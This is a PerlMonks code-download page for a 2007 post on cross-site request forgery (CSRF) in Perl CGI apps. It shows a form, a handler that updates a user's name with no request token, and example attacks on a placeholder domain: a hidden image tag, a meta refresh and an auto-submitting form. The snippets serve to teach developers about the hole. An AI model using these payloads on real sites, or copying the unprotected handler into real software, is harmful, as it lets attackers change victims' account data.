Beefy Boxes and Bandwidth Generously Provided by pair Networks
Do you know where your variables are?
 
PerlMonks  

Is your web application really secure? ("CSRF")

by tinita (Parson)
on Mar 27, 2007 at 18:49 UTC ( #606832=perlmeditation: print w/ replies, xml ) Need Help??

Help for this page

Select Code to Download


  1. or download this
    <form action="http://yourdomain.example/script" method="POST">
    <input type="text" name="realname">
    <input type="submit" name="submit.save_realname" value="Save">
    </form>
    
  2. or download this
    if ($cgi->param('submit.save_realname')) {
      my $name = $cgi->param('realname');
    ...
      $user->realname($name);
      $user->update;
    }
    
  3. or download this
    <img src="http://yourdomain.example/script?submit.save_realname=1;real
    +name=owned" height="0" width="0" alt="">
    or even:
    <meta http-equiv="refresh" content="0; URL=http://yourdomain.example/s
    +cript?submit.save_realname=1;realname=owned">
    
  4. or download this
    <body onLoad="document.forms[0].submit()">
    <form action="http://yourdomain.example/script" method="POST">
    <input type="text" name="realname">
    <input type="submit" name="submit.save_realname" value="Save">
    </form>
    

Log In?
Username:
Password:

What's my password?
Create A New User
Node Status?
node history
Node Type: perlmeditation [id://606832]
Approved by Corion
Front-paged by Corion
help
Chatterbox?
and the web crawler heard nothing...

How do I use this? | Other CB clients
Other Users?
Others drinking their drinks and smoking their pipes about the Monastery: (12)
As of 2015-07-29 13:37 GMT
Sections?
Information?
Find Nodes?
Leftovers?
    Voting Booth?

    The top three priorities of my open tasks are (in descending order of likelihood to be worked on) ...









    Results (263 votes), past polls